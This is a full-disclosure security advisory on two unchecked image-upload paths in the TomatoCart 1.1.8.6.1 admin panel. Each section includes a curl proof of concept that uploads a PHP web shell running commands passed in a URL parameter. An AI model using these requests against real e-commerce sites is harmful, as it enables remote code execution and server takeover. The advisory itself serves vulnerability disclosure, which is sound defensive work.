TomatoCart version 1.1.8.6.1 suffers from a shell upload vulnerability.
63e4197d92bb8171bb14bf5926941e3ec8dae1a129691757075007248b94ed9b
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: TomatoCart v1.1.8.6.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@tomatocart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
TomatoCart has multiple locations where the upload of images is allowed. In two
of these locations, the file type and extension of the uploaded file are not
checked, which leads to code execution.
Please note that an admin account with at least some privileges is required to
exploit this issue.
3. Code Execution 1
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a new slide image, there are no checks as to what type the
uploaded image actually is. Because of this, an attacker that gained admin
credentials can upload a PHP file and thus gain code execution.
The rights needed are Content -> Slide Images.
Proof of Concept
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=--------1106460043' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"module\"\x0d\x0a\x0d\x0aslide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0asave_slide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x0d\x0a----------1106460043--\x0d\x0a' \
'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php'
3. Code Execution 2
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a new product image, there are no checks as to what type the
uploaded image actually is. Because of this, an attacker that gained admin
credentials can upload a PHP file and thus gain code execution.
The rights needed are Content -> Products.
Proof of Concept
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=--------1775010584' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"path\"\x0d\x0a\x0d\x0a\x0d\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"cmd\"\x0d\x0a\x0d\x0aupload\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"dir\"\x0d\x0a\x0d\x0a.\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x
0d\x0a----------1775010584--\x0d\x0a' \
'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image'
5. Solution
This issue has not been fixed by the vendor
6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-Code-Execution-88.html